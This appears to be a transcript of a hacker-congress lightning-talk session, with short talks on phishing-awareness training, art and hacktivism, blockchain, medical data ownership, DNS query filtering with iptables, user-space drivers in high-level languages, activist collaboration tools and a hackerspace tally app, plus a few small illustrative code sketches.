Then they don't know that they did something wrong, they don't know how they can improve in the future or how they would recognize a real attack. Accordingly, the goal that employees learn nothing is achieved. Now we know how to run a bad campaign. In principle, you can simply invert all these points to see how to run a good one; I have rephrased it a little. In the ideal case, if you really want to get something across to people, go there and treat the employees and the IT department as a team. You want to work on this together so that your company becomes safer. Announce the whole thing, and wait a while before you start, until the employees have half forgotten that such a campaign exists, so that the announcement itself does not skew your statistics. But someone who behaves wrongly will remember: there was an announcement, they want to do this together with us, they want to help us protect the company, and nobody is out to get us. Don't do mass phishing, do spear phishing. Real attackers, yes, they sometimes send exactly the same email to everyone, but in the ideal case you send each person an individual email tailored to their individual situation. Accordingly, you have a higher chance of reaching them every time, of catching them every time, everyone can learn something, and people cannot simply warn each other. Then you should only use the capabilities of a real attacker, because an attacker, at least before he has compromised you technically, is at first only capable of sending things in from the outside. Accordingly, there is no point in using your complete admin power, because then you are simply doing more than a real attacker could, and it is generally still enough. And the mail should not say that a real colleague is moving out and wants to sell their furniture, but at most that some made-up outside person wants to sell their furniture or something like that. This way your employees are not sad, or at least hopefully none of the people affected is upset with you. And accordingly, explain the attack right away: show people how to behave correctly at exactly the moment they behave wrongly. Beyond that, there are also various providers and offerings you can get help from or engage with, who know what should and should not be done. If you have any questions or want to contact me, here are a Twitter handle and an email address. Thank you for your attention. Thank you. So next up is the work quantum, or the work quantum and the life quantum, I don't really know. Are you here? Are you in the room? Who wants to give this talk? So no, it's actually okay. I think we have some people from the waiting list here, but we will just continue with the next talk now. And yeah, we'll see. I'll call him up eventually, maybe. Oh, actually that's the last talk before the break, right? Does anyone have a schedule? Okay, then where are the people from the waiting list? Are you here? Oh, nobody showed up. Okay. So then that's a bit sad because we have so much time now. No, he left actually. I saw him leave. All right, then yeah, we're going to have a break until 12.30 right now. It's a bit, actually I don't have the slides for the people who, which slides do you mean? Oh, yeah, he was here yesterday. But you can, yeah, yeah, it's a lot. No, I mean, I told the waiting list people to come here 15 minutes before the break and it's still not 15 minutes before the break. So I don't know, maybe we wait a little and whistle the jeopardy melody or something. There's someone. I don't know. You're the first one after the break. Okay. I mean, we can just take your talk and do it right now.
All right. Then thank you. All right, then we will just continue with the first talk after the break, because the break is important to align all the other talks in the other halls. Then let's go. Hi, everyone. My name is Julie Lotzko and I'm an artist and researcher who's focused on subversion and critical stances on the technological and media landscape. And in this endeavor, I wrote a doctoral thesis on the intersections between hacker culture, especially hacktivism, and the arts, both in a historical view and in contemporary art. And this presentation is a little part of my upcoming book. And it's really hard for me to condense it into such a short time. So please feel free to find me after this talk or after the lightning talk session in Komona. If you don't, then probably fish me out of the bubble bath. In order to examine the intersections between the historical avant-garde art, which includes all the isms from after the First World War, including Dadaism, surrealism, and so on, I looked at different definitions of hacking. This is very interesting. So I probably don't have to define hacking for you. In my research, I use a definition from Tim Jordan, whereby hacking produces new materialities that define new ways of interacting with technology. I also probably don't have to define what a zero-day or social engineering is. So I just move on to the second slide, where I started to examine the similarities between the avant-garde art movements and hacker culture, and especially hacktivism. And within the avant-garde, I mostly looked at Dadaism. And it's very apparent from the first moment that there's a lot of similarities in terms of border violation practices, manifestos which try to aim for a future utopia, a new composition of society, like a kind of aim to recompose societal factors. There's a kind of need for an existing canon in both of these paradigms to build on and to interfere with in a revolutionary way. And in order to better understand what is really going on in the similarities, I looked at some traditions to interpret avant-garde artworks and some traditions to interpret hacking gestures, and I tried to cross-breed them. So in the next slide, we see some avant-garde artworks contextualized by Jordan's hacking typology. You see Duchamp's Fountain as a zero-day, where the zero-day exhibits the biggest amount of creativity and innovation, something that has never been done before, so it exploits a yet unknown vulnerability, whereas every other ready-made after Fountain would be a zero-plus-one-day, as the vulnerability is still present, but it already has a smaller amount of innovation and appreciation from the community. Social engineering is really, really big in the avant-garde, especially when it comes to performance. There's a picture from the 1919 Zurich performance in the Saal zur Kaufleuten. There was a reading, the "Letzte Lockerung", where the idea was to provoke the audience into a chaotic mess, which the Dadaists happily achieved. And script kiddies, in terms of Dadaist artwork recombination, would be like commercially aimed reconstructions of Dadaist artworks. You also see the motivational basis of hacking by Tim Jordan there, where most of the original and appreciated avant-garde artworks are more aiming for societal change, whereas, for instance, a t-shirt that you buy in a souvenir shop would be aimed at personal gain for whoever released it.
Which might be a bit new for you is where I try to examine hacker culture in the context of the already available interpretational framework of avant-garde artworks. And Kodpanos has a really interesting book which looks at avant-garde artworks as processes instead of artworks in the classical object definition, an object as such. He looks at the process. So in terms of this analysis, Kodpanos points out that the avant-garde artwork tries to deconstruct the work of art, and in order to understand it, we have to focus on the process, how it's made. We first do abstraction in avant-garde artwork in order to get rid of representation, action as in activism aimed at change in society, and anti-art in order to create novelty, which funnily, as a paradox of success, gets canonized quite fast afterwards. And he defines six characteristics of this process-based analysis. Ephemerality in this regard would be that a lot of avant-garde artworks are just there for a very short time. You don't really have an object that you could buy and sell, which is sort of hacking the art market. We also see that a lot of the hacking gestures are very short-lived in nature, but that doesn't make their achievement less. The communal aspect of the avant-garde process can be mapped mostly to free and open source software and git repositories. I'm sorry, we have to take the break. Do you have a contact slide or something, a last slide you would like to show? Yeah, as a finishing sentence, I'd like to say that one parallel is that neither the avant-garde nor hacktivism or hacker culture really destroyed the institutions that they wanted to reform or hack or revolutionize, but the interventions that they created changed those institutions forever. All right, thank you. Blockchain, Ethereum, cringe, but cool. Yes, there's the clicker. Right. So I subtitled my talk "often, but not only, a vehicle for fraud", since I don't think there's really any getting away from the fact that that is the first thing you'll see if you Google for it. But it's worth having a Google. There are some really funny ones. So I would say that when people talk about blockchain, and I do also cringe when I say that word, people are generally talking about a system that does three things. A system where everything is signed, so potentially you can know where everything's come from; it can have a known origin. They have some sort of common logic, usually referred to as smart contracts, although that's a bad name really, they should be dumb scripts, but at least you have a way of saying A and B happen and they always mean C. You also have a fair and reliable ordering of events. So you can say that, for example, a house moves from A to B before B tried to sell it to C, and that's very important. That last bit, the ordering, is the only bit that actually uses a blockchain. And if your threat model is different, you can just use an append-only cryptographic log. There was a talk on that yesterday. So looking at this in a little bit more detail, the signing bit tends to be done with what we would call wallets. Some of them are done with hardware, most of them are mobile phones. The common logic is interpreted using some sort of deterministic program. The important thing is it's deterministic. It always has to give the same results, otherwise, this being a networked data structure, the whole thing breaks down. And then the last bit is some sort of robust consensus mechanism.
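As an aside, the first two ingredients, signing and a tamper-evident ordering, can be illustrated with a toy append-only log, the cryptographic-log alternative mentioned above. This is a sketch for illustration only, not Ethereum code, and it assumes the third-party cryptography package is installed.

    # Toy append-only log: every entry is signed and chained to the previous one, which gives
    # a known origin and a tamper-evident ordering of events.
    import hashlib
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
    from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

    GENESIS = b"\x00" * 32

    class Log:
        def __init__(self):
            self.entries = []   # (prev_hash, payload, public_key_bytes, signature)

        @staticmethod
        def entry_hash(entry):
            return hashlib.sha256(b"".join(entry)).digest()

        def append(self, payload: bytes, key: Ed25519PrivateKey):
            prev = self.entry_hash(self.entries[-1]) if self.entries else GENESIS
            signature = key.sign(prev + payload)   # the signer commits to the ordering too
            public = key.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw)
            self.entries.append((prev, payload, public, signature))

    alice = Ed25519PrivateKey.generate()
    log = Log()
    log.append(b"house moves from A to B", alice)
    log.append(b"B sells the house to C", alice)
    print(len(log.entries), "entries, head:", Log.entry_hash(log.entries[-1]).hex()[:16])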
Actually the one that people talk about is Nakamoto consensus, where you run a lot of computers wasting electricity, but that's far from the only way of doing it. So in summary, the real general purpose of having some sort of blockchain is you have a very slow, but honest and transparent computer that nobody owns and everyone can accept the result as being fair. Notice that's not all that you need, so generally blockchain projects tend to have what in the Ethereum world, which as you can see is my preferred platform, we call the holy trinity. So some sort of messaging, some sort of distributed storage that relies on nodes across the internet rather than just one central server. And then the blockchain itself is just for consensus. It's essentially a very slow, reliable computer, but you don't want to use a computer that takes 15 seconds to respond very much in your system if you can avoid it. But you very often have to. The holy trinity phrase is very much an Ethereum thing. If you talk to Bitcoin maximalists, they would say the only purpose of this is currency. I disagree, but you have to admit their system is very successful. And systems like this are great for finance. There's a lot of interesting products around borrowing, lending, mostly cryptocurrencies, but hopefully real things as well. There are a lot of interesting projects around registering property assets, et cetera. And decentralized naming systems, trust games around finding the truth of various statements, and Ponzi schemes, which are sort of an inevitable side effect. It's a vehicle for social coordination. So here are some interesting projects. Uniswap is for trading things. uPort is a great system for proving things about your identity. So you can assemble an identity out of different statements that different people made about you. There's Kickback, which is a great event organizing software that we have that's used very often for Ethereum events, and I would recommend it. And Mattereum, who are doing very ambitious stuff on coding legal contracts and ownership onto the blockchain, which is very useful for transnational trade where a lot of parties simply don't trust each other. There's also quite a lot of fraud, and although I'd like to say that some people might recognize the BitConnect guy, I think he's been convicted, so hopefully I'll get away with the fact that that isn't Creative Commons. It's worth a Google. I'd say don't let it define your notion of the space, but it's really worth a Google, and the BitConnect guy is hilarious, and some of the SEC stuff is really thought provoking. So in summary, the next time you try to kill Facebook, do remember us. Most of the fraud didn't involve any developers. It's a very separate community, and there's a great conference in Vienna. I'd like to emphasize the unicorns. Thank you. All right. And then next up is owning our own medical data. There you go. Okay. I'm Reza. You can find me on GitHub as Fishman. I saw some interesting talks here about the electronic health record in Germany. So I spent three years in the healthcare system in the government in Germany. I most recently built an earthquake detection system for a big mine somewhere in the world, and basically the summary of the talk is if we want to own our data, the only way we can do it is if we build the infrastructure ourselves. So we do have a need for medical data stored somewhere. We can improve care. We can improve preventive care. We can improve the speed of medical improvements.
We can replace radiologists to some extent, and right now the X's model is you go to the doctor, you fill out the form, at least in Germany, and then you give wildcard access to everything, and there's no real way to revoke it, especially since you don't really remember who you gave it to. So some of the good ideas of the EPA is that you can give fine-grained X's except they already rolled back on that, so that's probably not going to happen. So the bad parts of it. All of your data is stored in a central location. All of the decryption keys, because it's symmetric, is stored in another central location, and if you have a breach, everyone's data is gone, and there's nothing really you can do about it. So what can we do about it is we store our own data. We build a federated API that gives third-party EHRs access to our data, and then, of course, the encryption keys are not stored on the mobile device or whatever. This is just one of the ideas, so I welcome people to actually give maybe better ideas on how we could do it, and it would allow us to actually share the data we want with the people we want. So a lot of the thread stuff that they say about the EPA, of course, we know is not true. We know that the moment the data goes on the end device, you can store it unless you control the entire ecosystem, which is unrealistic, because all the health record management systems by the doctors, most of them are running on Windows, so the moment it goes on there, the guarantee of expiry is kind of not there, so I would keep it out of the threat moment. But at least if we leak data, it leaks from some devices, not all the medical data. So basically it's more of a call to action, so we would have to build a POC, we would have to think about the cryptographic solution to this, and then the real places, and that's the thing, we probably cannot expect the government to use this, but we can expect third parties if our APIs are better than what the government does, which is actually really easy, then there is a chance that people would actually use that instead, or at least give us the choice of also using that. So I set up a GitHub account which doesn't have anything here because I was angeling and like sleeping a little. So I might fill this in the next couple of weeks, but yeah, feel free to help out. All right, thank you. I think the previously missing speaker just showed up. There he is. All right. Then we will take this talk over here. All right. Sorry about that. Sorry, that's perfect because you're invited to disagree with these statements. So a little audience participation. So let's look at the top three statements. Values is not price. Values is not violence. Values is not greed. So without defining values. I invite you to put your hands, palms face up on somewhere where you can remember them. So like your lap. So you keep them like that. And this side over here, if you would put your hands like this on your legs, like rest them on your lap, because you're going to turn them around maybe. Let's take values is not price. That could say values are not for sale. The question I ask you is if you think that is a value, turn over your right hand. On this side, you can put your hands just like this. And if you think that is not a value, turn over your left hand. And right here, the same thing. You can put your hands just on your lap. And if you're not sure, don't do anything. And if you think it's both, raise both your hands. And now everyone up, you're with your hands. What do you got? Okay. 
We've got like confusion. And we've got two hands. There shouldn't be any two hands here. You're only invited to if, okay. So here's the problem. Right? Everyone wants to say their own opinion. And they're like, huh? I didn't agree to this values. I didn't think that's that. The point is that some people will think that's a value. Some people will think that's not a value. And the real question isn't like can I represent my own values? It's about can we bring people together to talk about them? So that's the question. So proof of human collaboration. Whenever humans have a moment together, they have an opportunity to give what's called a compliment, which comes from the Latin with, let's see, what was it? I had it there somewhere. But it essentially means that you give someone a value that you yourself hold dear. You wouldn't tell someone's kind if you hadn't heard yourself that you had been kind. And so that's the basis for this general discussion. So we tried representing our values and kind of got nowhere, which I think, which I also have trouble with this. I'm just discovering values for myself. The main difference is that we're talking about, that we're coming from a culture where it's really easy to have one value, price, it's really easy to know what is more valuable in terms of price. It's really easy to know if someone is a fascist, it's really easy to know what their main values are. Small lists of values held dearly without the ability to consider them in the context of others. So that algorithm there is essentially one way that you can see how good otherness of value has. There's a lot of depth to this subject. When I talk about work quanta and healing quanta, everything that this project imagines as successful comes in the context of healing. If we design our work to make up for what it takes from the human and from the environment, then we're on the right track. And so by federating over values, a federation in this system is any objects with shared values. If that's human, if that's an institution, if you have two values in common, you're federated. This is what we haven't had a word for this yet, but this is a way of describing human values in a context. Those are consensus rings, and they've shared compliments over a group of values. And those red lines are the values that they have in common. This is essentially because we live in an owned power situation rather than a shared power situation, it helps to keep people in their own value structures rather than in a structure of discourse and development and exchange of what could be the next money. Thank you. All right. So next up is DNS query filtering, and with that we are back on track. The times are as in the schedule again. There you go. Hello. I'm here, Peter, and I'm going to talk about DNS query filtering or how to increase your performance and accidental block users. So the problem we had was that we have an authoritative name server, which is actually two name servers. One is a recursive name server that's not our solution, and there is a solution that's ours and it's written by us, but it has to be complemented with a real and feature-complete recursive DNS server. But because we are using a recursive server, that means we serve everything, and because we serve everything, that's a great UDP amplification vector. And the problem is that we had no time to fix it nicely as we were notified by the provider, our cloud provider, that we either fix this or we are going to be blocked, and we don't like being blocked. 
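The fix described next is iptables hex string matching on the DNS wire encoding of their own zone name. As background, here is a small hypothetical Python helper showing what that byte pattern looks like; it is an illustration of the idea, not the actual rules from the talk.

    # Hypothetical helper: DNS puts the query name on the wire as length-prefixed labels,
    # so "events.ccc.de" becomes \x06events\x03ccc\x02de\x00. A whitelist rule with
    # iptables -m string --hex-string matches exactly this byte pattern in port 53 payloads.
    def qname_wire_format(name: str) -> bytes:
        out = b""
        for label in name.strip(".").split("."):
            out += bytes([len(label)]) + label.lower().encode("ascii")
        return out + b"\x00"   # the empty root label terminates the name

    def iptables_hex_pattern(name: str) -> str:
        wire = qname_wire_format(name)
        return "|" + " ".join(f"{byte:02x}" for byte in wire) + "|"

    print(iptables_hex_pattern("events.ccc.de"))
    # Caveat from the talk: 0x20 mixed-case queries ("eVeNtS.cCc.dE") carry different case
    # bytes for the same labels, so a naive case-sensitive match wrongly drops them.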
So, possible solutions. Fixing it nicely: this takes long, either because we fix our custom solution, which takes a lot of development time, or because we use a different recursive DNS server that allows us to filter which zones we serve, for example ours and nothing else. Or we could use iptables rate limiting, which means we serve less junk, but we still serve it, and we also serve fewer of our valid users. Or we could create content filtering, and that takes some development, and it would be nice, but we don't have time, so: nope, iptables. So we are going to use string matching, to be specific hex string matching, but this sounds very, very expensive in kernel space, so we must perf test it. We did hex string filtering like this. If you want to filter events.ccc.de on UDP port 53, then you can do it like this, and this blocks it, or on TCP almost the same. But this is block listing, not white listing. We tried out hex string matching, and the overhead is very low. Our original setup could serve 60,000 queries per second from our zone, from one node obviously, and less than 5,000 recursive queries per second. So with hex string matching, we could drop 240,000 recursive queries per second, which is very nice, and it took only 1% CPU time, which is a great and low overhead solution. And we could still serve near the original 60,000 queries per second from our zone. But the problem is that we wrongly filter all TCP traffic, which is less than 0.1% of our traffic, and wrongly drop all 0x20 queries, which is around 2 percent, a bit less. TCP filtering is not that easy if you think about it, because the streams can be fragmented and you can't just string match packet by packet, which is quite obvious. Although every guide tells you to do it like you do on UDP, that only works because they block list, not white list, so it doesn't work for us. And on TCP, we don't have a UDP amplification vector, so why do it anyway? 0x20 is a security feature: if you encode random bits as lowercase and uppercase letters, then you can be kind of sure that you got a valid answer. events.ccc.de becomes lowercase e, uppercase V, lowercase e, uppercase N, lowercase t, uppercase S, and so on. We like memes, but not in our DNS queries. However, this is a quite easy problem, because you can solve it with case-insensitive matching, and then it's not a problem anymore. In conclusion, it was fun to try it out, and I blocked 2.3% of our users, which was less fun. The takeaway is that we must test more thoroughly if we introduce stricter iptables rules. You can do that by inserting the new rule before the existing one, doing some logging, whatever you want. Thank you for your attention, and major props to Max, my colleague who recommended the hex string filter, and thanks to Vista from the NOC, who helped me prepare. Right, thank you, and next up is writing drivers in high-level languages. Hi, I'm Paul, and I'm going to talk about writing drivers in high-level languages again. This is a talk that I've given quite a few times now, and a lot of people have contributed to that. I've also brought a lot of slides, so we'll just skip over a lot of things here. Good news is there's a long version of that talk available on media.ccc.de if you just search for something with drivers in high-level languages. Okay, of course, drivers, operating systems, and so on are usually written in C, because C is such an awesome language.
It's nice, low-level, can poke with pointers on memory and do weird stuff, everyone can read and write C, and if you try really, really hard, then you can even write safe and secure code and see at least some people think they can. I actually don't think they can, but well. So if you look at security bugs in this is CVEs in the Linux kernel over the years, there are a lot of security issues, but of course, not all of them can be attributed to C as a shitty language, but some of them can. There have been studies, for example, in 2017, 61% of the code execution type vulnerabilities in the Linux kernel would have been prevented if it was a memory-safe language that was in use for the kernel, like it would be use after free and missing bounce checks and so on. And we took this data from this study, it was linked down below, and looked at where these bugs actually occurred, and out of the 40 bugs that could have been prevented with a better language, 39 of them were in drivers, and then doing a group buy by vendor, and who is the vendor with the most bugs? Well, 13 run Qualcomm drivers, it was really, really surprising, I thought they had really high quality drivers, but yeah. So question is, can you write drivers in a better language? Yeah, it's a little bit complicated to get a Haskell driver upstreamed in Linux, and also to even get something other than C running inside the kernel, but the good news is that for many devices you don't actually need a kernel driver, you can write user space drivers in any languages. Question is then, of course, are all languages an equally good choice? Are some languages better suited for writing drivers? What are the trade-offs? What about having a JIT compiler or a garbage collector on a driver? Is that even a good idea? So we looked at network drivers in particular, because we happen to know a lot about network drivers, and also user space network drivers like DPDK or Snap and so on are also really common in the high-speed or high-performance world. So what I did two years ago is I wrote a user space network driver in C that was a talk here two years ago, and this is kind of simple driver, easy to understand, because it just does only the very basic things, it's only a thousand lines of code. And next idea was then to write that in a better language, of course, wanted to write it in all the languages, but turns out that's a lot of work and I don't speak all the languages. Good thing is I work at a university, so I can just grab a bunch of students and tell them to write drivers in their favorite languages. Then we had in the end nine driver implementations in these languages, C, Rust, Go, C-sharp, Haskell, O'Camill, Python, our table is not up to date, there's also Java driver nowadays as well. And then we compared them by various criteria like which safety properties are being offered by the language, under which scenarios, under which constraints, and just going to skip over these results because not much time here. Then implementation size, you might think C is very nice because it's just some Terse code full of pointer magic, but other languages can be short as well. Sure, C is still the shortest counted by lines of code, but other languages can be even shorter when measuring the size as in how many bytes are in the source code of the driver because some languages are just like lots of short lines like Haskell or Rust. Yeah, next question, is it fast? Is it a good idea? 
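Before the performance numbers, a rough illustration of the mechanism such user space drivers rely on: mapping the NIC's PCI registers into the process and accessing them like memory. This is a sketch under assumptions, not the actual driver code; the PCI address and register offset are placeholders, and it needs root plus a device that is not bound to a kernel driver.

    # Rough illustration of a user-space driver poking NIC registers: map the device's PCI
    # BAR0 via sysfs and access it like memory.
    import mmap
    import os
    import struct

    PCI_ADDRESS = "0000:03:00.0"   # placeholder PCI address
    REG_OFFSET = 0x0008            # hypothetical 32-bit device register

    fd = os.open(f"/sys/bus/pci/devices/{PCI_ADDRESS}/resource0", os.O_RDWR)
    bar0 = mmap.mmap(fd, os.fstat(fd).st_size)   # shared, read/write mapping of BAR0

    value = struct.unpack_from("<I", bar0, REG_OFFSET)[0]    # read the register
    print(f"register 0x{REG_OFFSET:04x} = 0x{value:08x}")
    struct.pack_into("<I", bar0, REG_OFFSET, value | 0x1)    # set a bit and write it back

    bar0.close()
    os.close(fd)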
Well, turns out C is still the fasted language for this kind of job, but Rust comes pretty close and also surprisingly fast for these low level driver stuff, this is a simple benchmark where we just accept packets on a dual port 10G link, minimum size packets, forward and back on the other link, like a bi-directional forwarder, the simplest case you can imagine for a network driver and surprisingly fast are go, C sharp, and well, for us it's not surprising that it's fast. Then performance is always two things, next one is latency, but this graph is too complicated to explain. Basically, garbage collector means high tail latency, no garbage collector is as fast. The lines for C and Rust are directly on top of each other, there's no latency penalty for using Rust over C, but there are latency penalties for languages with jit compilers and garbage collectors, however, the go and Java garbage collectors are surprisingly well done, at least the goes by default well done, Java when you use the new Shenandoah garbage collector then it's relatively fast, we can get tail latency below 50 microseconds, which is acceptable for most applications. Final slide, there is a GitHub repository with links to these slides, to recordings of all versions of the talks and to all the codes. Thank you. Thank you. Next up is Tour de Rebel. Yeah. Hello people, everybody welcome, thank you for being here. Now you see a logo over there and I suggest that we're going to start to play a game, because the logo has been transformed the past few days, my cousin has helped me to transform the logo because it's Tour de Rebel is related to extinction rebellion, but it's not the extinction rebellion tour on bike. So let's play a game, because I expected to be, I didn't know which room I would be, so I didn't know that I would be speaking in such a huge audience over here, I thought I would be something like the nutshell and I'm here with my PowerPoint presentation, anti-technology, but there are a lot of those flyers hanging around and there's a QR code in which you can find much more information and hopefully some are enthusiastic about the project after my short presentation of five minutes and would like to join an introduction presentation online in the next few weeks. But what is Tour de Rebel? That's what I'm going to explain now, but if anybody can see this, maybe zoom in with your good cameras on the QR code, I don't know whether that's possible. So Tour de Rebel, the world's largest moving climate camp on bike around the world. So everybody now sees a pink elephant in front of your eyes, like okay moving climate camp, so now I'm trying to wipe away those clouds in front of the Tour de Rebel and try to explain the vision of the people I met the past two months which I was encountering during my cycling tour around, well I was also cycling around the globe, but I mean I was not coming further than the Netherlands and Germany, but I started at least. So Tour de Rebel, what I'm presenting now to you is not my idea, but a collection of the ideas of many people I met the past two months. 
It started with an idea, okay I want to slow travel, I want to make sustainable traveling just much more nicer because it's such an experience to cycle the stage between Hamburg and Bremen for example, which have been one hour of train or one hour by car for me the past few years and now I did this within one week with a couple of other people and it was just such an amazing adventure to get in touch with nature again and to slow travel through the world. However, slow traveling is only one aim of the Tour de Rebel, an experience sending adventure because it's far more than just cycling around the globe because everybody apparently is currently doing that, if you look on Instagram you'll find Pet of the World and all the other people, it's nothing really special and connecting and I want to do something with the other people I'm cycling around to do something with just connecting movements who are trying to change the system with each other. So the second aim of the Tour de Rebel is try to form a network of a platform for people to meet each other. Imagine a few hundred people cycling together from Bremen to let's say Berlin and on the way from Bremen to Berlin they meet a lot of people from different organizations, they network with each other, they exchange experiences and they exchange skills and knowledge and that is something which is lacking from my point of view within organizations but also between organizations so the Tour de Rebel tries to be a platform for networking and I already mentioned the last aim of the three aims which is skill sharing and information spreading so if you imagine a climate camp cycling around the globe and you arrive, at least for example I arrive with five people together in a small village of 200 people, nobody noticed but if you arrive with 200 people in a 200 village, 200 person village, it will be noticed, it will be the event of the year so a climate camp slash justice, social justice camp is an attention point if you cycle by bicycle around the globe, everybody wants to be there at least hopefully everybody who prompt for future, I don't need those people but at least the rest of the population is interested. So still what is it now, how can I join or be part of it, scan the QR code because it's not only about cycling, I started cycling the past two months and many people joined, we were about 50 people cycling in total from point to point and in the end many people also took background organization stuff like filming and stuff so what is needed now is an organizational team and building a platform and if you want to join, clap in. Thank you very much and play the game and search for the QR codes of the Tour de Rebel, thank you. You can put it in front of the stage, you can put the QR code in front of the stage so everybody who wants can scan it. Yeah, just somewhere there, so next talk is going to be a listling an open source web app. So hi everyone, my name is Sven and today I want to talk shortly to you about the need for low threshold collaboration in self-organized groups. So let's start by imagining or picturing ourselves in a self-organized group like a group that's based on voluntary work, like an activist group or a civic group, you know. And in those groups we have people with different backgrounds and that also means people with different IT skills and often those groups features an open participation model so you can easily join but that also means you can easily leave and often you have fluctuating members. 
So for now let's imagine we have our little group with Alice and Bob, long-standing members, and then there's this newcomer eager to join. So what are the challenges they face for online collaboration? If the group uses multiple online tools for collaboration, you will have this scenario where they tell the newcomer: okay look, we have a shared task list and we use this app, please install it; and then we have a poll, please use this website and register; and also we have a wiki and we will make you an account. And the newcomer is like: oh okay, I installed five apps, and what was my password for the first one? Okay, this can get quite overwhelming. So some groups then say, okay, let's use just one software, a groupware, and this is, yeah, cool, but it also has a steeper learning curve. That's not a problem in an enterprise environment where you have one week of onboarding time, but in a voluntary setting this is really off-putting for newcomers, and also many groups don't have the resources to set up a groupware. So what I see often when I'm active in activist groups is that we use pads, like Etherpad, or spreadsheets, so collaborative documents, and they are fine if you want to do collaborative text work. But if you use them for other use cases, and people often do, like let's say a to-do list, then, yeah, in a text document it's already a pain to move items around, and if you have a spreadsheet it's like: okay, I have all the cells and buttons and then I have formulas and formatting options, okay, no. So all in all I would say this creates something like a collaboration barrier, and what I see very often in those groups is that only a small minority of people use those online collaboration tools, and then we have something like: okay, then let's just do everything over email, or let's do everything in a Telegram channel, and that can be quite messy. So what can we do about that? One night I had this idea: what if we had a collaborative document, but with a bit more structure, better fitting the typical use cases of self-organized groups, and what about lists? So it turns out that groups often need lists. To-do lists, this is obvious, but the wiki could also just be a small list of notes, and the poll is also just a list of options where you can vote, and if you have a meeting, again, that is also a list, and so on and so on. So in 2018 I sat down and said, okay, I'm going to make Listling, and Listling is a service to make and edit collaborative lists. It's online, you can use it, and it has no registration whatsoever, you just create a list and share the link. It's free to use and it has a focus on a simple UI. Of course it's open source and you can hack it and contribute if you want. So now this would be the time for a demo, but actually, what is a presentation? A presentation is just a list of slides, so I thought, well, then I do it in Listling, and that's what you saw just now. Nevertheless, I have some screenshots for you. You can not only do presentations; lists have different features, and in the middle you see a task list where you can assign people or check items or whatever, and on the right side you see an example poll, so you can add options and vote for them.
And if you want to get in touch, if you have any questions, we have a GitHub community, you can find me on Twitter, and also you can talk to me right there after all the other lightning talks are over. So, in the name of Alice, Bob and the newcomer: thank you. Thank you. Next up is Unary, yet another tally sheet for your hackerspace. Good morning. I'm Johannes and I'm going to talk about something that's at the heart of every hacker or maker space today: it's consuming beverages and keeping working based on the beverages you consume, and everybody needs a tally sheet for that, to keep a track record of who's consuming what. So the use case here is a very simple version of this, just a tally sheet, but in an electronic system, so it's just a system that helps the users to keep track of their balance. And the security model here is trust, so if you have physical access to the fridge you can compromise the system. So there are lots of solutions, obviously, because every hackerspace needs something like this, and all of these solutions typically are sexy hacking projects, because it was so much fun to develop some custom hardware, to make it run on some vintage stuff, you know, have a barcode scanner, things like that. It's very sexy for hacking, but often it's not so sexy for maintaining, and also the usability is typically not the greatest you can have. So that's why I developed yet another of these systems, and my system is boring. The idea is to have a very boring solution, a very simple solution that's still nice in usability. And for this I just use off-the-shelf components, I just use modern web frameworks, and I also use just an old Android tablet, one of these old tablets that are not fun to use anymore. You can just use it for this system, because each tablet comes with a high-resolution touch screen, and that's really great for usability. So here's how it looks. You can see, you know, we have a screen where you can pick your account based on the color you picked or based on some icon. Easily identifiable, you can filter for users, and then after you've picked your account you can pick the beverages you would like to consume, you get visual feedback when you buy something, and you have features like adding cash deposits, or looking at your recent transactions and reverting wrong transactions, things like that. Many more features, but the idea here is that it's not about features, it's about how simple the system really is. So looking at the software side of things, you can see that on the server we just deliver one single HTML page, which is the web application, and then we continue handling requests and managing the database, and for this we need less than 300 lines of code on the server side, in Python. On the client side we use the Vue.js framework, which is very nice because we can embed the variables and logic into the HTML code, and then we have the reactive nature of this framework, which makes it easy to just keep the state in a JavaScript object. So this JavaScript object is only 150 lines of code, and the rest is just how UI elements are supposed to look and behave. It's a very simple system, and it's also very simple because we use WebSockets for communication. WebSockets allow us to send simple messages, and the Socket.IO library also persists the connection between the server and the client, so it's also very low latency and very robust. And using this we also take advantage of the reactive nature of Vue.js: what we do is, when you for example buy a product, the client doesn't update its own state, roughly as in the sketch below.
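To make that pattern concrete, here is a minimal, hedged sketch of a server in this style, using python-socketio on top of aiohttp. This is not the actual Unary code; the event names, products and user names are made up. The Vue client would simply emit buy events and render whatever state events arrive.

```python
# pip install python-socketio aiohttp
# Hedged sketch of the pattern from the talk, not the real Unary server:
# the client only emits events, the server owns the state and pushes it out.
import socketio
from aiohttp import web

sio = socketio.AsyncServer(cors_allowed_origins="*")
app = web.Application()
sio.attach(app)

# Toy in-memory state; a real system would keep this in a database.
balances = {"alice": 0, "bob": 0}          # cents
prices = {"mate": 150, "beer": 120}        # cents

@sio.event
async def connect(sid, environ):
    # A freshly connected tablet immediately gets the current state.
    await sio.emit("state", balances, to=sid)

@sio.event
async def buy(sid, data):
    user, product = data["user"], data["product"]
    balances[user] -= prices[product]
    # The client is not answered with "your new balance is X"; instead the
    # authoritative state is broadcast to every connected client.
    await sio.emit("state", balances)

if __name__ == "__main__":
    web.run_app(app, port=8080)
```

The point of the design shows up here: the server is the single source of truth, so the client-side JavaScript can stay tiny.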
The client just gets visual feedback for successfully buying the product. The balance is updated by the server, and the server pushes the state to the client constantly, so that's also saving us a lot of logic on both sides. For the deployment, still boring: we have it running in the Freilab for a year now, on just an old Sony tablet, and the whole system is actually contained in the tablet. There's no other server or any other system or hardware needed to consume beverages in the Freilab. And this is made possible by the Termux environment. Many people think Termux is just a terminal application, but actually it provides a full-blown distro, and you can install all these packages, and you can actually run the server components with a start-up script on the tablet itself. So it doesn't even need an internet connection or anything to work. The user just sees the browser, and the browser is put into full-screen mode, so the user doesn't actually see the browser, only sees our interface, as I showed you in the screenshots. But this is obviously not the only way you can do it, right? If you want to, you can still put the server component on some other machine and have multiple clients, and WebSocket and Socket.IO libraries are something you can find in every language or environment. So in the Freilab this system has already been running for almost a year with no complaints. It's only a thousand lines of code, so there's not much that can go wrong, but it's still in a works-for-me state. So I'm very happy to take this to the next level, and I'm very happy to get feature requests, people who would like to deploy this too, or also change it and make it more sustainable. And there are also some alternatives you might want to look at. Thank you. Thank you. Next up is natural language processing is harder than you think. All right, hi, my name is Ingle, and I'm going to talk about why NLP, despite things like BERT and GPT-2, is not solved yet, and is really harder than most people think. So, have you ever been disappointed by an NLP system, like your Alexa or your car or some other thing you use? I am, daily, and I work on these types of things, which is a sad state. But why is that? It is because language is hard, and language is ambiguous, and language is complex, and language is 